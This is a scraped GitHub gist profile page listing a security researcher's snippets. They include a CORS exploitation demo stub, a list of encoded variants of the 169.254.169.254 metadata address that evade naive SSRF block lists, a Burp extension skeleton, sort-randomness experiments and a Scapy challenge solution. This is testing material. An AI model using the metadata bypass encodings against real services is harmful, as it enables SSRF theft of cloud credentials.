Skip to content

Instantly share code, notes, and snippets.

View coffeetocode's full-sized avatar

Patrick Thomas coffeetocode

27 followers · 1 following
View GitHub Profile
@coffeetocode
coffeetocode / CORS_demo.html
Created November 11, 2022 17:20
Basic HTML page for demoing exploitation of excessively open CORS policies
<html><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
<title>CORS test</title>
</head>
<body>
<h2>CORS Demo</h2>
<script>
//Original script from http://www.html5rocks.com/en/tutorials/cors/
// Create the XHR object.
@coffeetocode
coffeetocode / example_output.txt
Last active September 15, 2022 18:29
Example of bypasses for naive blacklists of 169.254.169.254 local metadata service. Useful for SSRF testing, among other things. See https://twitter.com/coffeetocode/status/912788650408026112
$ ./try_local_metadata.sh
Trying 169.254.169.254... found metadata
Trying 169.254.43518... found metadata
Trying 169.16689662... found metadata
Trying 2852039166... found metadata
Trying 0251.0376.0251.0376... found metadata
Trying 0251.0376.0124776... found metadata
Trying 251.0775248... -
Trying 25177524776... -
Trying 0xa9.0xfe.0xa9.0xfe... found metadata
@coffeetocode
coffeetocode / latacora_logged_compares.js
Created October 1, 2016 22:14
Code for part of http://coffeetocode.net/2016/10/sorting-out-a-nerdsnipe/
const_arr = ["Erin Ptacek", "Thomas Ptacek", "Jeremy Rauch"]
arr = []
var results = {"Erin Ptacek": {0:0, 1:0, 2:0},
"Thomas Ptacek": {0:0, 1:0, 2:0},
"Jeremy Rauch": {0:0, 1:0, 2:0},
};
// custom sort function definition equiv to "x-y"
@coffeetocode
coffeetocode / erin_is_cheating.js
Created October 1, 2016 22:12
Code for part of http://coffeetocode.net/2016/10/sorting-out-a-nerdsnipe/
var results = {"Erin Ptacek": {0:0, 1:0, 2:0},
"Thomas Ptacek": {0:0, 1:0, 2:0},
"Jeremy Rauch": {0:0, 1:0, 2:0},
};
for(var i = 0; i < 1000000; i++) {
var arr = ["Erin Ptacek", "Thomas Ptacek", "Jeremy Rauch"].sort(function(x, y) { return 1 - Math.ceil(Math.random() * 100) % 3; });
for(var name in results) {
results[name][arr.indexOf(name)]++;
}
@coffeetocode
coffeetocode / BurpPluginDemo.py
Created September 14, 2013 05:47
Code sample included with "Burp Extensions in Python & Pentesting Custom Web Services" at http://labs.neohapsis.com/
# These are java classes, being imported using python syntax (Jython magic)
from burp import IBurpExtender
from burp import IHttpListener
# These are plain old python modules, from the standard library
# (or from the "Folder for loading modules" in Burp>Extender>Options)
from datetime import datetime
class BurpExtender(IBurpExtender, IHttpListener):
@coffeetocode
coffeetocode / reassemble_mptcp_challenge.py
Created August 7, 2014 19:28
Scapy solution for Black Hat MPTCP audience challenge http://labs.neohapsis.com/2014/08/06/blackhat-usa-multipath-tcp-tool-release-audience-challenge/
# Uses Nicolas Maitre's MPTCP-capable scapy impl, so that should be
# on the python path, or run this from a directory containing that "scapy" dir
from scapy.all import *
packets = rdpcap("pcaps/neohapsis_mptcp_challenge.pcap")
payload_packets = [p for p in packets if TCP in p
and p[IP].src in ("192.168.1.26", "192.168.1.33")
and TCPOption_MP in p
and p[TCPOption_MP].mptcp.subtype == 2
and Raw in p]